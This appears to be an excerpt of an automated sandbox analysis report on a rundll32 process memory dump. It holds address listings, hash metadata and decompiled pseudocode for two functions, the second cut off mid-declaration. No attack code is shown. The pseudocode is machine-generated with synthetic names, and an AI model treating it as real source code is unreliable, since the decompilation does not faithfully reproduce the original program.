                                                                                            0x00000000
                                                                                            0x045ed7d4
                                                                                            0x045ed7d4
                                                                                            0x045ed7d7
                                                                                            0x045ed7df
                                                                                            0x0463b3d4
                                                                                            0x0463b3d9
                                                                                            0x0463b3dc
                                                                                            0x0463b3dc
                                                                                            0x0463b3df
                                                                                            0x0463b3e2
                                                                                            0x0463b468
                                                                                            0x0463b46d
                                                                                            0x0463b46f
                                                                                            0x0463b46f
                                                                                            0x0463b475
                                                                                            0x045ed8f8
                                                                                            0x045ed8f9
                                                                                            0x045ed8fd
                                                                                            0x0463b3e8
                                                                                            0x0463b3e8
                                                                                            0x0463b3eb
                                                                                            0x0463b3ed
                                                                                            0x00000000
                                                                                            0x0463b3ef
                                                                                            0x0463b3ef
                                                                                            0x0463b3f1
                                                                                            0x0463b3f4
                                                                                            0x0463b3fe
                                                                                            0x0463b404
                                                                                            0x0463b409
                                                                                            0x0463b40e
                                                                                            0x0463b410
                                                                                            0x0463b410
                                                                                            0x0463b414
                                                                                            0x0463b414
                                                                                            0x0463b41b
                                                                                            0x0463b420
                                                                                            0x0463b423
                                                                                            0x0463b425
                                                                                            0x0463b427
                                                                                            0x0463b42a
                                                                                            0x0463b42d
                                                                                            0x0463b42d
                                                                                            0x0463b42a
                                                                                            0x0463b432
                                                                                            0x0463b436
                                                                                            0x0463b438
                                                                                            0x0463b43b
                                                                                            0x0463b43b
                                                                                            0x0463b449
                                                                                            0x0463b44e
                                                                                            0x0463b454
                                                                                            0x0463b458
                                                                                            0x0463b458
                                                                                            0x0463b45d
                                                                                            0x00000000
                                                                                            0x0463b45d
                                                                                            0x0463b3ed
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ed7df
                                                                                            0x045ed7d2
                                                                                            0x045ed7ca
                                                                                            0x0463b37c
                                                                                            0x0463b37e
                                                                                            0x0463b385
                                                                                            0x0463b38a
                                                                                            0x00000000
                                                                                            0x0463b38a
                                                                                            0x045ed742
                                                                                            0x045ed7f1
                                                                                            0x045ed7f8
                                                                                            0x0463b49b
                                                                                            0x0463b49b
                                                                                            0x045ed800
                                                                                            0x045ed837
                                                                                            0x045ed843
                                                                                            0x045ed845
                                                                                            0x045ed847
                                                                                            0x045ed84a
                                                                                            0x045ed84b
                                                                                            0x045ed84e
                                                                                            0x045ed857
                                                                                            0x045ed802
                                                                                            0x045ed802
                                                                                            0x045ed80d
                                                                                            0x00000000
                                                                                            0x045ed818
                                                                                            0x045ed818
                                                                                            0x045ed824
                                                                                            0x045ed831
                                                                                            0x0463b4a5
                                                                                            0x0463b4ab
                                                                                            0x0463b4b3
                                                                                            0x0463b4b8
                                                                                            0x0463b4bb
                                                                                            0x00000000
                                                                                            0x0463b4c1
                                                                                            0x0463b4c1
                                                                                            0x0463b4c8
                                                                                            0x00000000
                                                                                            0x0463b4ce
                                                                                            0x0463b4d4
                                                                                            0x0463b4e1
                                                                                            0x0463b4e3
                                                                                            0x0463b4e5
                                                                                            0x00000000
                                                                                            0x0463b4eb
                                                                                            0x0463b4f0
                                                                                            0x0463b4f2
                                                                                            0x045edac9
                                                                                            0x045edacc
                                                                                            0x045edacf
                                                                                            0x045edad1
                                                                                            0x045edd78
                                                                                            0x045edd78
                                                                                            0x045edcf2
                                                                                            0x00000000
                                                                                            0x045edad7
                                                                                            0x045edad9
                                                                                            0x045edadb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045edae1
                                                                                            0x045edae1
                                                                                            0x045edae4
                                                                                            0x045edae6
                                                                                            0x0463b4f9
                                                                                            0x0463b4f9
                                                                                            0x0463b500
                                                                                            0x045edaec
                                                                                            0x045edaec
                                                                                            0x045edaf5
                                                                                            0x045edaf8
                                                                                            0x045edafb
                                                                                            0x045edb03
                                                                                            0x045edb11
                                                                                            0x045edb16
                                                                                            0x045edb19
                                                                                            0x045edb1b
                                                                                            0x0463b52c
                                                                                            0x0463b531
                                                                                            0x0463b534
                                                                                            0x045edb21
                                                                                            0x045edb21
                                                                                            0x045edb24
                                                                                            0x045edcd9
                                                                                            0x045edce2
                                                                                            0x045edce5
                                                                                            0x045edd6a
                                                                                            0x045edd6d
                                                                                            0x00000000
                                                                                            0x045edd73
                                                                                            0x0463b51a
                                                                                            0x0463b51c
                                                                                            0x0463b51f
                                                                                            0x0463b524
                                                                                            0x00000000
                                                                                            0x0463b524
                                                                                            0x045edce7
                                                                                            0x045edce7
                                                                                            0x045edce7
                                                                                            0x00000000
                                                                                            0x045edce7
                                                                                            0x00000000
                                                                                            0x045edb2a
                                                                                            0x045edb2c
                                                                                            0x045edb31
                                                                                            0x045edb33
                                                                                            0x045edb36
                                                                                            0x045edb39
                                                                                            0x045edb3b
                                                                                            0x045edb66
                                                                                            0x045edb66
                                                                                            0x045edb3d
                                                                                            0x045edb3d
                                                                                            0x045edb3e
                                                                                            0x045edb46
                                                                                            0x045edb47
                                                                                            0x045edb49
                                                                                            0x045edb4c
                                                                                            0x045edb53
                                                                                            0x045edb55
                                                                                            0x045edb58
                                                                                            0x045edb5a
                                                                                            0x0463b50a
                                                                                            0x0463b50f
                                                                                            0x0463b512
                                                                                            0x045edb60
                                                                                            0x045edb60
                                                                                            0x045edb63
                                                                                            0x045edb63
                                                                                            0x00000000
                                                                                            0x045edb63
                                                                                            0x045edb5a
                                                                                            0x045edb3b
                                                                                            0x045edb24
                                                                                            0x045edb69
                                                                                            0x045edb69
                                                                                            0x045edb6c
                                                                                            0x045edb6f
                                                                                            0x045edb74
                                                                                            0x0463b557
                                                                                            0x0463b557
                                                                                            0x0463b55e
                                                                                            0x045edb7a
                                                                                            0x045edb7c
                                                                                            0x045edb7f
                                                                                            0x045edb82
                                                                                            0x045edb85
                                                                                            0x00000000
                                                                                            0x045edb8b
                                                                                            0x045edb8b
                                                                                            0x045edb8d
                                                                                            0x045edb9b
                                                                                            0x045edb9b
                                                                                            0x045edb9d
                                                                                            0x045edba0
                                                                                            0x045edba2
                                                                                            0x045edba4
                                                                                            0x045edba7
                                                                                            0x045edba9
                                                                                            0x045edbae
                                                                                            0x045edbae
                                                                                            0x045edbb1
                                                                                            0x045edbb4
                                                                                            0x045edbb4
                                                                                            0x045edbb7
                                                                                            0x045edbba
                                                                                            0x045edcd2
                                                                                            0x045edcd4
                                                                                            0x00000000
                                                                                            0x045edbc0
                                                                                            0x045edbc0
                                                                                            0x045edbd2
                                                                                            0x045edbd7
                                                                                            0x045edbda
                                                                                            0x045edbdd
                                                                                            0x045edbdf
                                                                                            0x00000000
                                                                                            0x045edbe5
                                                                                            0x045edbe5
                                                                                            0x045edbee
                                                                                            0x045edbf1
                                                                                            0x0463b541
                                                                                            0x0463b544
                                                                                            0x00000000
                                                                                            0x0463b546
                                                                                            0x0463b546
                                                                                            0x00000000
                                                                                            0x0463b546
                                                                                            0x045edbf7
                                                                                            0x045edbf7
                                                                                            0x045edbfd
                                                                                            0x045edbfd
                                                                                            0x045edbff
                                                                                            0x045edc0b
                                                                                            0x045edc15
                                                                                            0x045edc1b
                                                                                            0x045edc1d
                                                                                            0x045edc21
                                                                                            0x045edc21
                                                                                            0x045edc23
                                                                                            0x045edc23
                                                                                            0x045edc26
                                                                                            0x045edc29
                                                                                            0x045edc2b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045edc31
                                                                                            0x045edc34
                                                                                            0x045edc36
                                                                                            0x045edcbf
                                                                                            0x045edcbf
                                                                                            0x045edcc2
                                                                                            0x00000000
                                                                                            0x045edc3c
                                                                                            0x045edc41
                                                                                            0x045edc43
                                                                                            0x00000000
                                                                                            0x045edc45
                                                                                            0x045edc45
                                                                                            0x045edc47
                                                                                            0x00000000
                                                                                            0x045edc4d
                                                                                            0x045edc4d
                                                                                            0x045edc50
                                                                                            0x045edc52
                                                                                            0x045edc55
                                                                                            0x045edcfa
                                                                                            0x045edcfe
                                                                                            0x045edd08
                                                                                            0x045edd0a
                                                                                            0x045edd0c
                                                                                            0x00000000
                                                                                            0x045edd12
                                                                                            0x045edd15
                                                                                            0x045edd2d
                                                                                            0x045edd2f
                                                                                            0x045edd32
                                                                                            0x045edd35
                                                                                            0x00000000
                                                                                            0x045edd35
                                                                                            0x045edc5b
                                                                                            0x045edc5b
                                                                                            0x045edc5e
                                                                                            0x045edc61
                                                                                            0x045edc64
                                                                                            0x045edc67
                                                                                            0x045edc67
                                                                                            0x045edc6a
                                                                                            0x045edc6c
                                                                                            0x045edc8e
                                                                                            0x045edc8e
                                                                                            0x045edc91
                                                                                            0x045edc93
                                                                                            0x045edcce
                                                                                            0x045edcce
                                                                                            0x045edc95
                                                                                            0x045edc9c
                                                                                            0x045edc6e
                                                                                            0x045edc72
                                                                                            0x045edc75
                                                                                            0x045edc77
                                                                                            0x045edc79
                                                                                            0x0463b551
                                                                                            0x0463b551
                                                                                            0x00000000
                                                                                            0x045edc7f
                                                                                            0x045edc7f
                                                                                            0x045edc81
                                                                                            0x00000000
                                                                                            0x045edc83
                                                                                            0x045edc86
                                                                                            0x045edc88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045edc88
                                                                                            0x045edc81
                                                                                            0x045edc79
                                                                                            0x045edc6c
                                                                                            0x045edc55
                                                                                            0x045edc47
                                                                                            0x045edc43
                                                                                            0x00000000
                                                                                            0x045edc36
                                                                                            0x045edc23
                                                                                            0x00000000
                                                                                            0x045edbff
                                                                                            0x045edbf1
                                                                                            0x045edbdf
                                                                                            0x045edb8f
                                                                                            0x045edb92
                                                                                            0x045edb95
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045edb95
                                                                                            0x045edb8d
                                                                                            0x045edb85
                                                                                            0x045edb74
                                                                                            0x045edc9f
                                                                                            0x045edca2
                                                                                            0x045edcb0
                                                                                            0x045edcb0
                                                                                            0x045edad1
                                                                                            0x0463b4e5
                                                                                            0x0463b4c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ed831
                                                                                            0x045ed80d
                                                                                            0x00000000
                                                                                            0x045ed800
                                                                                            0x0463b47f
                                                                                            0x0463b485
                                                                                            0x00000000
                                                                                            0x0463b485
                                                                                            0x045ed665
                                                                                            0x045ed652
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22218ab7f87e0681f91b3a7e0813dcfe3bbf0c9605c922f0915cfc84fdf1bb04
                                                                                            • Instruction ID: 0a8f0f7635eac175eb5ceae9ca0fe47fee256d88416c4406164dd0f0b770dad0
                                                                                            • Opcode Fuzzy Hash: 22218ab7f87e0681f91b3a7e0813dcfe3bbf0c9605c922f0915cfc84fdf1bb04
                                                                                            • Instruction Fuzzy Hash: A7E1A070A0036ACFEB28DF25D884B79B7B2BF85708F044199D9099B291E734BD89DF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E849B Relevance: .3, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E045E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x46af9c0);
				E0462D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x46c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E045ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E045F2280( *[fs:0x30], 0x46c8550);
						_t139 =  *0x46c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0460F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E045EFFB0(_t193, _t235, 0x46c8550);
								L5:
								return E0462D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E045D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x46c7b9c; // 0x0
							_t235 = L045F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x46c7b10; // 0x9
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0460A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E045EFFB0(_t193, _t235, 0x46c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L045F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L045F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x46c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x46c7b10; // 0x9
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E046137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x46c7b9c; // 0x0
									_t214 = L045F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E046137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x46c7b10 =  *0x46c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x46c7b04 =  *0x46c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L045F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L045F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x46c7b08 =  *0x46c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E046157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0461F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L045F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0460A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L045F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E046196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                            0x045e849b
                                                                                            0x045e849b
                                                                                            0x045e849b
                                                                                            0x045e849b
                                                                                            0x045e849d
                                                                                            0x045e84a2
                                                                                            0x045e84a7
                                                                                            0x045e84b1
                                                                                            0x045e84d8
                                                                                            0x00000000
                                                                                            0x045e84b3
                                                                                            0x045e84c4
                                                                                            0x045e84c9
                                                                                            0x045e84cd
                                                                                            0x045e84cf
                                                                                            0x045e84cf
                                                                                            0x045e84d6
                                                                                            0x045e84e6
                                                                                            0x045e84e9
                                                                                            0x045e84ec
                                                                                            0x045e84ef
                                                                                            0x045e84f2
                                                                                            0x045e84f4
                                                                                            0x045e84fc
                                                                                            0x045e8501
                                                                                            0x045e8506
                                                                                            0x045e8509
                                                                                            0x045e86e0
                                                                                            0x045e86e5
                                                                                            0x045e86e8
                                                                                            0x045e86ed
                                                                                            0x045e86f0
                                                                                            0x045e86f2
                                                                                            0x04639afd
                                                                                            0x04639b02
                                                                                            0x045e84da
                                                                                            0x045e84df
                                                                                            0x045e84df
                                                                                            0x045e86fa
                                                                                            0x045e86fd
                                                                                            0x045e86fe
                                                                                            0x045e8701
                                                                                            0x045e8706
                                                                                            0x045e8709
                                                                                            0x045e870b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e8711
                                                                                            0x045e8725
                                                                                            0x045e8727
                                                                                            0x045e872a
                                                                                            0x045e872c
                                                                                            0x04639af0
                                                                                            0x04639af5
                                                                                            0x045e8732
                                                                                            0x045e8732
                                                                                            0x045e8732
                                                                                            0x045e8735
                                                                                            0x045e8737
                                                                                            0x045e8515
                                                                                            0x045e8515
                                                                                            0x045e8518
                                                                                            0x045e851d
                                                                                            0x045e8523
                                                                                            0x045e8527
                                                                                            0x045e852b
                                                                                            0x045e8537
                                                                                            0x045e8539
                                                                                            0x045e853c
                                                                                            0x045e853e
                                                                                            0x045e868c
                                                                                            0x045e8691
                                                                                            0x045e8699
                                                                                            0x045e869b
                                                                                            0x045e8744
                                                                                            0x045e8748
                                                                                            0x045e86a1
                                                                                            0x045e86a1
                                                                                            0x045e86a1
                                                                                            0x045e86a4
                                                                                            0x045e86a8
                                                                                            0x04639bdf
                                                                                            0x04639bdf
                                                                                            0x045e86ae
                                                                                            0x045e86b0
                                                                                            0x00000000
                                                                                            0x045e86b6
                                                                                            0x00000000
                                                                                            0x04639be9
                                                                                            0x045e86b0
                                                                                            0x045e8544
                                                                                            0x045e854a
                                                                                            0x045e854d
                                                                                            0x045e8551
                                                                                            0x045e876e
                                                                                            0x045e8778
                                                                                            0x045e877b
                                                                                            0x045e8780
                                                                                            0x045e8557
                                                                                            0x045e8557
                                                                                            0x045e855d
                                                                                            0x045e855d
                                                                                            0x045e856b
                                                                                            0x045e856e
                                                                                            0x045e8570
                                                                                            0x045e8573
                                                                                            0x045e8576
                                                                                            0x045e8576
                                                                                            0x045e8579
                                                                                            0x045e857b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e8581
                                                                                            0x045e85a0
                                                                                            0x045e85a2
                                                                                            0x045e85a5
                                                                                            0x045e85a7
                                                                                            0x04639b1b
                                                                                            0x04639b1b
                                                                                            0x045e862e
                                                                                            0x045e862e
                                                                                            0x045e8631
                                                                                            0x045e8631
                                                                                            0x045e8634
                                                                                            0x045e8636
                                                                                            0x045e8669
                                                                                            0x045e8669
                                                                                            0x045e866b
                                                                                            0x04639bbf
                                                                                            0x04639bc4
                                                                                            0x04639bc8
                                                                                            0x04639bce
                                                                                            0x04639bce
                                                                                            0x045e8671
                                                                                            0x045e8671
                                                                                            0x045e8674
                                                                                            0x045e8676
                                                                                            0x04639bae
                                                                                            0x04639bae
                                                                                            0x045e8676
                                                                                            0x045e867c
                                                                                            0x045e867e
                                                                                            0x045e8688
                                                                                            0x045e8688
                                                                                            0x00000000
                                                                                            0x045e867e
                                                                                            0x045e8638
                                                                                            0x045e8638
                                                                                            0x045e863b
                                                                                            0x045e863e
                                                                                            0x045e863f
                                                                                            0x045e8642
                                                                                            0x045e8645
                                                                                            0x045e8648
                                                                                            0x045e864d
                                                                                            0x04639b69
                                                                                            0x04639b6e
                                                                                            0x04639b7b
                                                                                            0x04639b81
                                                                                            0x04639b85
                                                                                            0x04639b89
                                                                                            0x04639ba7
                                                                                            0x04639b8b
                                                                                            0x04639b91
                                                                                            0x04639b9a
                                                                                            0x04639b9f
                                                                                            0x04639b9f
                                                                                            0x045e8788
                                                                                            0x045e878d
                                                                                            0x045e8763
                                                                                            0x045e8763
                                                                                            0x045e8766
                                                                                            0x00000000
                                                                                            0x045e8766
                                                                                            0x04639b70
                                                                                            0x00000000
                                                                                            0x04639b70
                                                                                            0x045e8656
                                                                                            0x045e865a
                                                                                            0x045e865c
                                                                                            0x045e8752
                                                                                            0x045e8756
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e875e
                                                                                            0x00000000
                                                                                            0x045e875e
                                                                                            0x045e8662
                                                                                            0x045e8662
                                                                                            0x045e8662
                                                                                            0x045e8666
                                                                                            0x00000000
                                                                                            0x045e8666
                                                                                            0x045e85b7
                                                                                            0x045e85b9
                                                                                            0x045e85bc
                                                                                            0x045e85bf
                                                                                            0x045e85cc
                                                                                            0x045e85d1
                                                                                            0x045e85d4
                                                                                            0x045e85db
                                                                                            0x045e85de
                                                                                            0x045e85e0
                                                                                            0x04639b5f
                                                                                            0x00000000
                                                                                            0x04639b5f
                                                                                            0x045e85e6
                                                                                            0x045e85ea
                                                                                            0x045e86c3
                                                                                            0x045e86c5
                                                                                            0x045e86c8
                                                                                            0x045e86ca
                                                                                            0x04639b16
                                                                                            0x00000000
                                                                                            0x04639b16
                                                                                            0x045e86d6
                                                                                            0x045e85f6
                                                                                            0x045e85f6
                                                                                            0x045e85f9
                                                                                            0x045e8602
                                                                                            0x045e8606
                                                                                            0x045e860a
                                                                                            0x045e860b
                                                                                            0x045e860e
                                                                                            0x045e8611
                                                                                            0x00000000
                                                                                            0x045e8611
                                                                                            0x045e85f3
                                                                                            0x00000000
                                                                                            0x045e85f3
                                                                                            0x045e8619
                                                                                            0x045e861e
                                                                                            0x045e861e
                                                                                            0x045e8621
                                                                                            0x045e8622
                                                                                            0x045e8623
                                                                                            0x045e8625
                                                                                            0x045e862c
                                                                                            0x00000000
                                                                                            0x045e873d
                                                                                            0x00000000
                                                                                            0x045e873d
                                                                                            0x045e8737
                                                                                            0x045e850f
                                                                                            0x045e8512
                                                                                            0x00000000
                                                                                            0x045e8512
                                                                                            0x00000000
                                                                                            0x045e84d6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0b22f1adc3e440b8c2288e254dbb587d09294b1c5670282911b912d85d2e14e
                                                                                            • Instruction ID: be239e95e6bf682eee34f0cb6f057595a71d3fa640b79c98438de0765191a3ec
                                                                                            • Opcode Fuzzy Hash: c0b22f1adc3e440b8c2288e254dbb587d09294b1c5670282911b912d85d2e14e
                                                                                            • Instruction Fuzzy Hash: 19B13AB0E00249DFDB18DF9AC984AAEBBB5FF58304F144529E416AB241E770B945DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460513A Relevance: .3, Instructions: 258COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E0460513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
